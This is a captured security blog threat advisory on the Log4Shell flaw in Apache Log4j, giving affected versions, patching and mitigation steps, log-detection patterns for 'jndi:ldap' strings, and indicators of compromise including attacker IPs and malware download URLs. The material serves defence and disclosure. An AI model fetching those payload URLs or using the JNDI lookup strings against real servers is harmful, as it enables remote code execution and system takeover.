niiconsulting.com
Open in
urlscan Pro
166.62.10.188
Public Scan
URL:
https://niiconsulting.com/checkmate/2021/12/zero-day-vulnerability-aka-log4shell-in-apache-log4j-is-being-actively-exploited/
Submission: On December 14 via api from US — Scanned from DE
Submission: On December 14 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
<form id="commentform" class="comment-form">
<iframe title="Comment Form"
src="https://jetpack.wordpress.com/jetpack-comment/?blogid=9704473&postid=4141&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Comment&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_US&jetpack_version=8.4.3&show_cookie_consent=10&has_cookie_consent=0&token_key=%3Bnormal%3B&sig=741d382dc8e7b28bac5296467ee134ffcee797f0#parent=https%3A%2F%2Fniiconsulting.com%2Fcheckmate%2F2021%2F12%2Fzero-day-vulnerability-aka-log4shell-in-apache-log4j-is-being-actively-exploited%2F"
style="width: 100%; height: 58px; border: 0px;" name="jetpack_remote_comment" class="jetpack_remote_comment" id="jetpack_remote_comment" sandbox="allow-same-origin allow-top-navigation allow-scripts allow-forms allow-popups"
scrolling="no"></iframe>
<!--[if !IE]><!-->
<script>
document.addEventListener('DOMContentLoaded', function() {
var commentForms = document.getElementsByClassName('jetpack_remote_comment');
for (var i = 0; i < commentForms.length; i++) {
commentForms[i].allowTransparency = false;
commentForms[i].scrolling = 'no';
}
});
</script>
<!--<![endif]-->
<input id="ak_js" name="ak_js" type="hidden" value="1639441415356">
</form>GET https://niiconsulting.com/checkmate/
<form role="search" method="get" class="search-form" action="https://niiconsulting.com/checkmate/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>POST #
<form action="#" method="post" accept-charset="utf-8" id="subscribe-blog-blog_subscription-4">
<div id="subscribe-text">
<p>Enter your email address to subscribe to this blog and receive notifications of new posts by email.</p>
</div>
<p>Join 118 other subscribers</p>
<p id="subscribe-email">
<label id="jetpack-subscribe-label" class="screen-reader-text" for="subscribe-field-blog_subscription-4"> Email Address </label>
<input type="email" name="email" required="required" class="required" value="" id="subscribe-field-blog_subscription-4" placeholder="Email Address">
</p>
<p id="subscribe-submit">
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="source" value="https://niiconsulting.com/checkmate/2021/12/zero-day-vulnerability-aka-log4shell-in-apache-log4j-is-being-actively-exploited/">
<input type="hidden" name="sub-type" value="widget">
<input type="hidden" name="redirect_fragment" value="blog_subscription-4">
<button type="submit" name="jetpack_subscriptions_widget"> Subscribe </button>
</p>
</form>Text Content
MENU * Home * NII Home * About Us * Services * Products ► * FireSec * BlueScope * Research * Get Blog Updates * Home * NII Home * About Us * Services * Products * FireSec * BlueScope * Research * Get Blog Updates ZERO-DAY VULNERABILITY (AKA LOG4SHELL) IN APACHE LOG4J IS BEING ACTIVELY EXPLOITED December 13, 2021 Nandeesha B Threat Advisory 0 INTRODUCTION Log4Shell vulnerability (CVE-2021-44228) impacts multiple versions of a widely distributed Java software component, Apache Log4j 2. The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables and allows a remote attacker to execute arbitrary code on the target system. Apache Log4j2 <2.15, JNDI enables attackers to call external java libraries (jndi:ldap, jndi:rmi) which in turn allows the execution of remote commands in the environment. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system. Successful exploitation of this vulnerability may result in the complete compromise of a vulnerable system. Threat actors have already begin actively exploiting this vulnerability in the wild. VULNERABLE PRODUCT The vulnerability impacts all versions of Apache Log4j2 from 2.0-beta9 to 2.14.1 BUSINESS IMPACT Successful exploitation of the vulnerability would allow a remote unauthenticated attacker to execute arbitrary code, a complete takeover of unpatched devices and deploy further malicious payload to execute ransomware like disruptive attacks. REMEDIATION 1. Ensure to patch log4j to 2.15.0 and above. 2. For systems that can’t be updated (or at least not updated immediately) apply Logout4Shell vaccine to protect against exploits targeting the Log4Shell flaw. 3. Use commands & YARA rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228. 4. Test your apps for log4shell vulnerability. MITIGATIONS 1. In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. 2. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. NOTE: Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “false”, mitigating this risk. 3. Put a WAF or Proxy in front of the vulnerable Java app and block access toconnections containing “jndi:ldap” and “jndi:dns” in the request or user-agent strings. DETECTION 1. Search logs for the presence of jndi:ldap, jndi:ldaps: jndi:dns:jndirmi – Log4j RCE CVE-2021-44228 Exploitation Detection · GitHub 2. Logs can be scanned by using GitHub – Neo23x0/log4shell-detector: Detector for Log4Shell exploitation attempts HASH (SHA-256) IP’S 109[.]237[.]96[.]12462[.]102[.]148[.]69185[.]220[.]100[.]244185[.]220[.]101[.]142193[.]189[.]100[.]203147[.]182[.]169[.]254185[.]100[.]87[.]20272[.]223[.]168[.]73185[.]220[.]100[.]245185[.]220[.]101[.]143193[.]218[.]118[.]231147[.]182[.]219[.]9213[.]164[.]204[.]14681[.]17[.]18[.]60185[.]220[.]100[.]246185[.]220[.]101[.]145194[.]48[.]199[.]78151[.]115[.]60[.]113185[.]220[.]101[.]146104[.]244[.]72[.]115185[.]220[.]100[.]247185[.]220[.]101[.]147195[.]176[.]3[.]24159[.]65[.]58[.]66171[.]25[.]193[.]20104[.]244[.]74[.]57185[.]220[.]100[.]248185[.]220[.]101[.]148195[.]254[.]135[.]76159[.]65[.]155[.]208178[.]17[.]171[.]102104[.]244[.]74[.]211185[.]220[.]100[.]249185[.]220[.]101[.]149198[.]98[.]51[.]189164[.]90[.]199[.]21645[.]155[.]205[.]233104[.]244[.]76[.]170185[.]220[.]100[.]252185[.]220[.]101[.]153199[.]195[.]250[.]77167[.]99[.]164[.]201171[.]25[.]193[.]25107[.]189[.]1[.]160185[.]220[.]100[.]253185[.]220[.]101[.]156204[.]8[.]156[.]142167[.]99[.]172[.]58171[.]25[.]193[.]77107[.]189[.]1[.]178185[.]220[.]100[.]254185[.]220[.]101[.]157205[.]185[.]117[.]149167[.]99[.]172[.]213171[.]25[.]193[.]78107[.]189[.]12[.]135185[.]220[.]100[.]255185[.]220[.]101[.]158209[.]127[.]17[.]242185[.]220[.]100[.]241185[.]220[.]100[.]242107[.]189[.]14[.]98185[.]220[.]101[.]33185[.]220[.]101[.]161209[.]141[.]41[.]103185[.]220[.]101[.]37185[.]220[.]101[.]39122[.]161[.]50[.]23185[.]220[.]101[.]34185[.]220[.]101[.]16345[.]153[.]160[.]131185[.]220[.]101[.]4118[.]27[.]197[.]252171[.]25[.]193[.]20185[.]220[.]101[.]35185[.]220[.]101[.]16845[.]153[.]160[.]138185[.]220[.]101[.]5789[.]234[.]182[.]139171[.]25[.]193[.]25185[.]220[.]101[.]36185[.]220[.]101[.]16962[.]76[.]41[.]46185[.]220[.]101[.]134104[.]244[.]79[.]6171[.]25[.]193[.]77185[.]220[.]101[.]42185[.]220[.]101[.]17268[.]183[.]44[.]143185[.]220[.]101[.]14418[.]27[.]197[.]252171[.]25[.]193[.]78185[.]220[.]101[.]43185[.]220[.]101[.]17568[.]183[.]198[.]247185[.]220[.]101[.]15423[.]129[.]64[.]131178[.]62[.]79[.]49185[.]220[.]101[.]45185[.]220[.]101[.]17788[.]80[.]20[.]86185[.]220[.]101[.]16023[.]129[.]64[.]141181[.]214[.]39[.]2185[.]220[.]101[.]46185[.]220[.]101[.]179109[.]70[.]100[.]34185[.]220[.]101[.]17123[.]129[.]64[.]146185[.]38[.]175[.]132185[.]220[.]101[.]49185[.]220[.]101[.]180109[.]237[.]96[.]124185[.]220[.]101[.]18623[.]129[.]64[.]148185[.]83[.]214[.]69185[.]220[.]101[.]54185[.]220[.]101[.]181116[.]24[.]67[.]213185[.]220[.]102[.]24945[.]12[.]134[.]108185[.]100[.]87[.]41185[.]220[.]101[.]55185[.]220[.]101[.]182134[.]122[.]34[.]28188[.]166[.]48[.]5545[.]155[.]205[.]233185[.]100[.]87[.]202185[.]220[.]101[.]56185[.]220[.]101[.]185137[.]184[.]102[.]82188[.]166[.]92[.]22846[.]166[.]139[.]111185[.]107[.]47[.]171185[.]220[.]101[.]61185[.]220[.]101[.]189137[.]184[.]106[.]119188[.]166[.]122[.]4346[.]182[.]21[.]248185[.]129[.]61[.]1185[.]220[.]101[.]129185[.]220[.]101[.]191142[.]93[.]34[.]250193[.]189[.]100[.]19551[.]15[.]43[.]205185[.]220[.]100[.]240185[.]220[.]101[.]138185[.]220[.]102[.]8143[.]198[.]32[.]72193[.]218[.]118[.]18351[.]255[.]106[.]85185[.]220[.]100[.]242185[.]220[.]101[.]139185[.]220[.]102[.]242143[.]198[.]45[.]117195[.]19[.]192[.]2654[.]173[.]99[.]121185[.]220[.]100[.]243185[.]220[.]101[.]141193[.]31[.]24[.]154147[.]182[.]167[.]165212[.]193[.]57[.]225 URL’S http[:]//62.210.130.250/lh.shhttp[:]//18.228.7.109/.log/pty4;http[:]//62.210.130.250[:]80/web/admin/x86_64http[:]//18.228.7.109/.log/pty5;http[:]//62.210.130.250[:]80/web/admin/x86http[:]//210.141.105.67[:]80/wpcontent/themes/twentythirteen/m8http[:]//62.210.130.250[:]80/web/admin/x86_ghttp[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldmhttp[:]//45.130.229.168[:]9999/Exploit.classhxxp[:]//45.137.155[.]55/ex[.]shhttp[:]//18.228.7.109/.log/loghxxp[:]//45.137.155[.]55/kinsinghttp[:]//18.228.7.109/.log/pty1;hxxp[:]//80.71.158[.]12/libsystem.sohttp[:]//18.228.7.109/.log/pty2;hxxp[:]//80.71.158[.]12/kinsinghttp[:]//18.228.7.109/.log/pty3;hxxp[:]//80.71.158[.]12/Exploit69ogQNSQYz.class DOMAINS nazi[.]uy log[.]exposedbotnets[.]ru REFERENCES • New zero-day exploit for Log4j Java library is an enterprise nightmare • Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack • Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild • Log4Shell Explained Nandeesha B RELATED NEW WAVE OF TARGETED HACKING CAMPAIGNS AND RANSOMWARE ATTACKS EXPLOITING MICROSOFT EXCHANGE SERVER VULNERABILITIES Multiple threat actors, including Hafnium, LuckyMouse, Calypso, Winnti, Bronze Butler, Websiic, Tonto, Mikroceen, and DLTMiner, are actively targeting four zero-day Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) in their targeted malware attacks and hacking campaigns. These threat actors managed to compromise nearly 30,000 Microsoft Exchange servers located within the United… DEARCRY MAKES ORGANISATIONS CRY Note: We have also done a technical analysis on DearCry. Read here. It’s a warm summer morning. While sipping your morning coffee, you access the work email. But you’re unable to log in. After trying a few tricks you’ve read up in some tech blogs, you reach out to your… BIG TICKET DATA BREACHES HOW DO THEY GO UNDETECTED FOR SO LONG? Big Ticket Data Breaches How do they go undetected for so long? Introduction July 15, 2020 – PII Data of around 270 million Wattpad (a social storytelling website) users’ was leaked by an unknown hacker. The hacker released private data in public forums. According to researchers, the breach happened in… * * * * * * * BE THE FIRST TO COMMENT LEAVE A COMMENT CANCEL REPLY This site uses Akismet to reduce spam. Learn how your comment data is processed. FOLLOW US * Twitter * LinkedIn * Instagram * Facebook SEARCH Search for: SUBSCRIBE TO BLOG VIA EMAIL Enter your email address to subscribe to this blog and receive notifications of new posts by email. Join 118 other subscribers Email Address Subscribe TOP POSTS * Zero-day vulnerability (aka Log4Shell) in Apache Log4j is being actively exploited * A Detailed Guide on OSCP Preparation - From Newbie to OSCP * IT Act 2000 – Penalties, Offences With Case Studies * T’is The Season To Beware Of Online Scammers, Fa-la-la-la-la, la-la-la-la! * Malware Development – Welcome to the Dark Side: Part 1 * From SQL Injection To 0wnage Using SQLMap * Manipulating Host Headers - Not Anymore ! * Passive Subdomain Enumeration (Part 1) * Reverse Engineering x64 for Beginners - Windows * Malware Development – Welcome to the Dark Side: Part 2-1 * T’is The Season To Beware Of Online Scammers, Fa-la-la-la-la, la-la-la-la! * Zero-day vulnerability (aka Log4Shell) in Apache Log4j is being actively exploited * Significance of a career in Security Operations Center (SOC) * Windows Timeline: Putting the what & when together * Revealing REvil * The Ominous signs of a potential Inter-State Cyberwar * Cybersecurity Threats at the Olympics * Pegasus Spyware * Big Ticket Data Breaches How do they go undetected for so long? * Cyber-Attacks on Critical Infrastructure of a Country- How do they happen? How should we prevent them? Assessment C++ coding Cyber Security Elasticsearch ELK forensics FUD fully undetectable hacking Kibana malware Malware Analysis malware development PCI DSS Penetration Testing pentesting Ransomware red team remote access reverse shell security trojan virus Vulnerability Assessments * Pankaj Lad: It would have been better if there were a small liner kind of definations used for these termologies. * gmd: Can you please update the blog? as the images are not accessible. Thankyou. * Anuraag B: You can check our online courses here. Copyright © 2021 | WordPress Theme by MH Themes